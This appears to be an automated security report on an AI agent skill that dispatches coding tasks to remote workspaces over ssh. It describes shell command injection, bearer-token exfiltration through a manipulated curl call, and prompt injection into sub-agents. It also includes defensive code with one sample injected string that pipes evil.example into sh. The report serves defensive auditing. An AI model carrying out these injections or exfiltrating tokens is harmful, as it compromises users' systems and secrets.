Trust Assessment
perry-coding-agents received a trust score of 65/100, placing it in the Caution category. The skill carries security risks that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 3 high, 0 medium, and 0 low severity. Key findings include Remote Command Injection via LLM-generated task, LLM can exfiltrate secrets via manipulated `curl` command, Skill grants broad remote code execution permissions to LLM.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 25/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Remote Command Injection via LLM-generated task.** The skill constructs `ssh` commands that execute `opencode run` or `claude` on a remote workspace. The argument to `opencode run` or `claude` is an LLM-generated string (e.g., 'Your task.' or 'Add bearer token auth...'). This allows the LLM to inject arbitrary shell commands into the remote execution context, leading to full compromise of the remote workspace. The examples explicitly show the LLM generating a `curl` command, demonstrating the expectation that the LLM can generate executable code. *Remediation:* the LLM should provide only a *description* of the task; the actual execution logic, including any `curl` or other shell commands, should be templated and controlled by the host system, with LLM input strictly limited to data fields (e.g., the `text` in the `curl` payload). Implement strict sandboxing and least privilege for the remote workspaces. | LLM | SKILL.md:20 |
| HIGH | **LLM can exfiltrate secrets via manipulated `curl` command.** The dispatch pattern and examples embed a `curl` command within the LLM-generated task string, including an `Authorization: Bearer <hooks-token>` (or `<token>`) header. Since the LLM generates the entire string passed to `opencode run`, it can modify the `curl` command's URL, headers, or body to exfiltrate the `<hooks-token>`, or any other sensitive data accessible to the remote agent, to an attacker-controlled endpoint. *Remediation:* the `curl` command, especially the part containing sensitive tokens, must be constructed by the host system, not the LLM. LLM input should be strictly limited to the `text` field of the JSON payload and sanitized to prevent injection into the JSON structure itself. Tokens should be securely managed and injected by the host system. | LLM | SKILL.md:25 |
| HIGH | **Skill grants broad remote code execution permissions to LLM.** The core functionality of this skill is to let the LLM dispatch arbitrary coding tasks to remote `perry` workspaces via `ssh` and specialized coding agents (`opencode`, `claude`). This grants the LLM extensive capabilities to execute code, modify files, and interact with the network on these remote environments. While this is the intended purpose, it represents a significant security surface area. *Remediation:* implement robust isolation and sandboxing for all remote workspaces; ensure workspaces are ephemeral and reset after use; apply the principle of least privilege to the remote agents, limiting their network access and filesystem scope; and comprehensively log and monitor all agent actions. | LLM | SKILL.md:13 |
| HIGH | **LLM can inject instructions into remote coding agent.** The `task` argument passed to `opencode run` or `claude` is generated directly by the LLM, allowing it to inject arbitrary instructions or prompts into the remote coding agent, potentially overriding its intended behavior, causing unintended actions, or manipulating its output. This is a direct prompt-injection vector for the remote agent itself, distinct from shell command injection. *Remediation:* the remote coding agents (`opencode`, `claude`) should be designed with strong guardrails against prompt injection; input from the LLM should be treated as untrusted and validated; use structured task formats rather than free-form text where possible, or add a secondary verification step for critical actions. | LLM | SKILL.md:20 |
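The command-injection remediation above (a host-controlled template with the LLM string confined to a single data argument) can be sketched as follows. This is a minimal illustration, not the skill's actual dispatch code; the `dispatch_task` helper and host name are hypothetical.

```python
import shlex
import subprocess

def dispatch_task(host: str, task_text: str) -> None:
    """Run a coding-agent task on a remote workspace (illustrative).

    The remote command is a fixed template; the LLM-supplied task_text
    is quoted so it can only ever be the agent's prompt argument,
    never additional shell syntax.
    """
    # shlex.quote neutralises quotes, semicolons, pipes, $(...), etc.
    remote_cmd = f"opencode run {shlex.quote(task_text)}"
    # Passing ssh its arguments as a list avoids a local shell entirely.
    subprocess.run(["ssh", host, remote_cmd], check=True)

# An injection attempt stays inert: the whole payload becomes one
# single-quoted argument to `opencode run` on the remote side.
print(shlex.quote("Fix the bug'; curl evil.example | sh; '"))
```

The key design choice is that the host, not the LLM, decides what gets executed; the LLM's output is treated purely as data.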
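Likewise, the exfiltration remediation (host-constructed webhook request, LLM input limited to the JSON `text` field) can be sketched roughly as below. The function name and the `HOOKS_TOKEN` environment variable are illustrative assumptions, not part of the skill.

```python
import json
import os

def build_notify_payload(llm_text: str) -> tuple[dict, str]:
    """Build the webhook request server-side (illustrative).

    The LLM contributes only the value of the `text` field; json.dumps
    escapes any quotes or braces it contains, so it cannot alter the
    JSON structure. The bearer token is read by the host and never
    passes through the LLM.
    """
    body = json.dumps({"text": llm_text})
    token = os.environ.get("HOOKS_TOKEN", "")  # hypothetical token source
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    return headers, body

# Even input that tries to smuggle extra JSON keys stays a plain string:
_, body = build_notify_payload('", "url": "https://evil.example/"')
print(body)
```

Because the token and the request skeleton never appear in the LLM-generated string, a manipulated task cannot redirect or reshape the `curl` call.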